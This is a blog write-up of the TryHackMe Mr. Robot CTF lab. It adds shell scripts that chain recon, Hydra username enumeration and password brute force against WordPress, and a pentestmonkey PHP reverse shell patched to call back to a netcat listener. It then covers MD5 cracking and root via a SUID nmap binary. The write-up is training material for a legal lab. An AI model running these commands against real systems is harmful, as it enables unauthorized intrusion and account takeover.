Mr. Robot - TryHackMe lab

Published by Nick on

Today I am working on the Mr. Robot CTF from tryhackme.com. I am using the video from DarkSec to help with parts.

I start with an nmap scan against the host to see what ports are open.

Ports 80 and 443 are open. Those are HTTP and HTTPS, so I open the web browser to see what kind of site we are working with.

The website is themed on the show Mr. Robot and is really cool.

Checking the page source shows a cool easter egg: "You are not alone".

Checking robots.txt, we find the first key and a dictionary file; I download the dictionary file. robots.txt is worth reading on every web target, since it lists the paths the site owner wants crawlers to stay away from, which is exactly where the interesting files tend to be.

I run gobuster to check for other interesting pages on the web server; wp-login looks the most interesting.
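The recon steps above (port scan, robots.txt, directory brute force) as shell functions. This is an added example and not part of the original write-up; the target address and wordlist path are assumptions, since the lab IP is not given on the page, and the nmap output it parses is a constructed sample.

```shell
#!/bin/sh
# Added example, not from the original write-up: the recon steps as functions.
# TARGET and WORDLIST are assumptions; the lab IP is not given on the page.

TARGET="${TARGET:-10.10.10.10}"                               # assumption
WORDLIST="${WORDLIST:-/usr/share/wordlists/dirb/common.txt}"  # assumption

# Service scan of every TCP port, saved in all three nmap formats so the
# greppable one (.gnmap) can be parsed afterwards.
scan() {
    nmap -sC -sV -p- -oA "scan-$TARGET" "$TARGET"
}

# Pull the open TCP ports out of greppable nmap output read from stdin,
# one port per line, so the result can drive the web checks below.
open_ports_from_gnmap() {
    grep -o '[0-9]*/open/tcp' | cut -d/ -f1 | sort -n -u
}

# robots.txt is free information; read it before brute-forcing paths.
fetch_robots() {
    curl -sf "http://$TARGET/robots.txt"
}

# Directory brute force on one web port; -x adds the extensions a PHP site
# is likely to expose.
dirbust() {
    gobuster dir -u "http://$TARGET:$1/" -w "$WORDLIST" -x php,txt -t 40 -q
}

# Constructed sample of nmap -oG output (not a real scan of the lab).
SAMPLE_GNMAP='# Nmap 7.80 scan initiated
Host: 10.10.10.10 ()  Status: Up
Host: 10.10.10.10 ()  Ports: 22/closed/tcp//ssh///, 80/open/tcp//http//Apache httpd/, 443/open/tcp//ssl|https//Apache httpd/  Ignored State: filtered (65532)'

# Demo on the sample: prints 80 and 443, the two ports found in the write-up.
printf '%s\n' "$SAMPLE_GNMAP" | open_ports_from_gnmap
```

A typical run is `scan`, then `scan-$TARGET.gnmap` piped through `open_ports_from_gnmap`, then `fetch_robots` and `dirbust 80` for each web port found; only the parsing function runs offline.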

wp-login leads to a WordPress login page.

Next I switch FoxyProxy to my Burp proxy profile, then open Burp Suite.

With intercept on, I attempt to log in to the WordPress site with admin / admin.

This gives the error below. It is a bad one from the defender's side: WordPress states that the username is invalid, so the login form itself tells an attacker which usernames exist and can be used to enumerate valid usernames.

I run Hydra against the login page with that error as the failure condition and it turns up the username "Elliot". I try logging in as Elliot with the password "test", but that doesn't work.

I get a new error message, which is also bad practice: it confirms the username exists and only the password is wrong, so I can now use this second error as the failure condition to find the password.
Running Hydra again with the username fixed and the dictionary file I pulled down as the password list, I find the password and log into the WordPress site.
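The two-stage Hydra attack described above, as an added example that is not part of the original write-up. The target address, the wordlist file name and the exact WordPress error strings are assumptions; confirm the strings against the responses seen in Burp before using them as Hydra failure conditions, because a wrong failure string makes every guess look like a success.

```shell
#!/bin/sh
# Added example, not from the original write-up. WordPress returns one error for
# an unknown user and a different one for a bad password, so usernames are
# enumerated first and the password brute-forced second. TARGET, DICT and the
# error strings are assumptions; check them in Burp first.

TARGET="${TARGET:-10.10.10.10}"   # assumption: the lab IP is not on the page
DICT="${DICT:-dictionary.dic}"    # assumption: the wordlist from robots.txt
FORM="/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In"

# Classify a raw wp-login.php response (headers plus body).
classify_wp_login() {
    case "$1" in
        *"Invalid username"*)                              echo "no-such-user" ;;
        *"The password you entered for the username"*)     echo "wrong-password" ;;
        *"wordpress_logged_in"*|*"Location: "*"wp-admin"*) echo "success" ;;
        *)                                                 echo "unknown" ;;
    esac
}

# Wordlists lifted from a target are often full of duplicates; de-duplicating
# before Hydra cuts the attempt count. Writes the unique list to $2, prints its size.
prep_wordlist() {
    sort -u "$1" > "$2"
    wc -l < "$2" | tr -d ' '
}

# Stage 1: usernames. A guess counts as failed while the response still says
# "Invalid username"; anything else means the user exists.
enum_users() {
    hydra -L "$1" -p test -t 16 "$TARGET" http-post-form "$FORM:F=Invalid username"
}

# Stage 2: the password for a confirmed user. The failure condition is now the
# "wrong password" text, so a success is any response without it.
brute_password() {
    hydra -l "$1" -P "$2" -t 16 "$TARGET" http-post-form "$FORM:F=The password you entered"
}

# Demo on constructed response fragments (no network needed).
classify_wp_login '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
classify_wp_login '<div id="login_error"><strong>ERROR</strong>: The password you entered for the username <strong>elliot</strong> is incorrect.</div>'
```

Typical use is `prep_wordlist "$DICT" unique.txt`, then `enum_users unique.txt`, then `brute_password elliot unique.txt`. Keep `-t` modest against a single WordPress instance; a high thread count produces timeouts that Hydra can misreport as hits.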

The site runs WordPress version 4.3.1.
This user has access to the theme editor, so I start a netcat listener and see if I can get a PHP reverse shell.

PHP Reverse shell code: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

I edit the script to point at my listener's IP and port, paste it into a theme file, save it, and then browse to that page. When the page loads, the listener catches the reverse shell.
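Preparing the payload and the listener for the step above, as an added example that is not part of the original write-up. The callback address and port are assumed values, the raw download URL is derived from the GitHub link given above, and 404.php is a common choice of theme file to paste into, not one the write-up names.

```shell
#!/bin/sh
# Added example, not from the original write-up: set the callback address in
# pentestmonkey's php-reverse-shell.php and start the listener that will
# catch it. LHOST/LPORT are assumptions; LHOST must be the address the
# target can reach (the VPN interface, not the LAN one).

LHOST="${LHOST:-10.8.0.2}"   # assumption
LPORT="${LPORT:-4444}"       # assumption

# The script ships with "$ip = '127.0.0.1';" and "$port = 1234;" placeholders.
# Rewrite them and print the two lines back, so a typo in the address is
# caught before the file is pasted into the WordPress theme editor.
# Usage: patch_revshell <file> <lhost> <lport>
patch_revshell() {
    sed -e "s/^\\\$ip = '[^']*';/\\\$ip = '$2';/" \
        -e "s/^\\\$port = [0-9]*;/\\\$port = $3;/" "$1" > "$1.tmp" \
        && mv "$1.tmp" "$1"
    grep -E '^\$(ip|port) = ' "$1"
}

# Start listening before browsing to the edited theme page, otherwise the
# connect-back fails and the page just times out.
listen() {
    nc -lvnp "$1"
}

# Typical run (network steps commented out so the file is safe to source):
# curl -sO https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
# patch_revshell php-reverse-shell.php "$LHOST" "$LPORT"
# listen "$LPORT"   # then load the edited theme file (e.g. .../404.php) in the browser
```

The grep at the end of `patch_revshell` is the check worth keeping: the most common reason a reverse shell "doesn't work" is an address the target cannot route to, and that is visible in those two lines before anything is uploaded.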

I find a file on the server that contains the MD5 hash of the password for a user account.

I feed the hash to John the Ripper and it cracks to the password shown above.

su refuses to run without a proper terminal, so I have to upgrade to an interactive shell before I can log in as the user.

That works and I am now the robot user, but still not root.
Looking for SUID binaries, I find one for nmap.
I open an interactive shell and use the command from GTFOBins to get root.
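The post-exploitation steps above (cracking the hash, upgrading the shell, hunting SUID binaries, abusing nmap) as shell functions. This is an added example, not code from the original write-up; the hash, the wordlist and the user name from the lab are not shown on the page, so the demo and its checks use constructed values.

```shell
#!/bin/sh
# Added example, not from the original write-up. The hash, user and file
# paths from the lab are not on the page, so constructed values are used.

# Dictionary attack on an unsalted MD5 hash. john --format=raw-md5 does the
# same far faster; the loop shows why a raw MD5 of a dictionary word falls
# instantly. Usage: crack_md5 <hex hash> <wordlist>; prints the word, returns 1 if none.
crack_md5() {
    target_hash=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(printf '%s' "$word" | md5sum | cut -d' ' -f1)" = "$target_hash" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# The same attack with John the Ripper; $1 is a file holding "user:hash" (or just the hash).
john_md5() {
    john --format=raw-md5 --wordlist="$2" "$1" && john --show --format=raw-md5 "$1"
}

# su refuses to run without a terminal, so upgrade the netcat shell first.
# Old targets ship "python" as Python 2; use python3 on newer boxes.
upgrade_shell() {
    python -c 'import pty; pty.spawn("/bin/bash")'
}

# List setuid files under a tree (default /). Root-owned ones outside the
# normal base set (passwd, su, sudo, mount, ...) are the candidates.
find_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null | sort
}

# GTFOBins: old nmap (2.02 to 5.21) has an --interactive mode whose "!sh"
# command spawns a shell with the setuid effective uid. Type !sh at the
# nmap> prompt, then check with `id`: uid stays the low-privilege user but
# euid=0(root). Note that bash drops the setuid euid unless started with -p.
nmap_suid_shell() {
    nmap --interactive
}

# Demo on constructed data.
printf 'letmein\npassword\nhunter2\n' > /tmp/demo_words.txt
crack_md5 5f4dcc3b5aa765d61d8327deb882cf99 /tmp/demo_words.txt   # md5("password")
```

On a real engagement, run `find_suid` once and diff it against a clean install of the same distribution; the lab makes nmap stand out, but on production hosts the interesting entry is usually a vendor binary nobody remembers installing.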

I now have root access!

